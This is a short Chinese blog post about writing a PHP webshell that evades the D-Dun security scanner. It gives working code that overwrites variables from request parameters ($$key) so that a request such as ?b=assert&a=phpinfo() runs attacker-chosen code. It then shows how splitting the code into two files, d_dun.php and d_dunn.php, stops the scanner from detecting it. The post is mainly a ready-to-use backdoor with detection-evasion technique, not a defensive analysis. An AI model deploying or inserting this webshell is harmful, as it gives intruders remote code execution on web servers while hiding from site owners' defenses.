过D盾的马马

  • A+
所属分类:颓废's Blog
摘要

发现最近过waf很好玩,异想天开的写代码就好了(当然要写的对),然后自己也来试一试,想到了利用变量覆盖来绕过~


简介

发现最近过waf很好玩,异想天开的写代码就好了(当然要写的对),然后自己也来试一试,想到了利用变量覆盖来绕过~

开始玩耍吧

首先,我们先来了解一下变量覆盖漏洞,这里我之前写过一个文章,可以转到此处看(https://www.zybuluo.com/1kbfree/note/1135811),然后这里运用的就是$$变量覆盖方法,代码如下

<?php    $a = '小狗狗你好啊';  $b = '小盾盾你好啊';  // 你妹    foreach ($_REQUEST as $key => $value) {   $$key = $value;  }   $b( $a ); 

然后访问并且带上参数?b=assert&a=phpinfo();就可以执行phpinfo函数,如下

过D盾的马马

然后放到D盾处骚(我日,输入法自己打的)一下

过D盾的马马

此时心情 -> 你妹,擦。[email protected]%awdaw..(省略一万字)

这都给拦截了,好吧,然后就试了一下然后发现很多办法都没成功,虽然级别只是1,但是依旧不是最完美的,然后就在i春秋看到一个表哥利用分离方法来绕过了,很骚气,原文链接:https://bbs.ichunqiu.com/thread-25644-1-1.html。。。 然后我也试一下,发现是可以绕过的,如下

过D盾的马马

然后再放D盾扫下

过D盾的马马

嘻嘻,这里D盾已经没扫到了(谢谢盾哥配合啊) 你妹

最后d_dun.php代码是

<?php  $a = '小狗狗你好啊'; $b = '小盾盾你好啊'; // 你妹  foreach ($_REQUEST as $key => $value) {  $$key = $value; }

d_dunn.php代码是

<?php  include 'd_dun.php'; $b( $a );

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: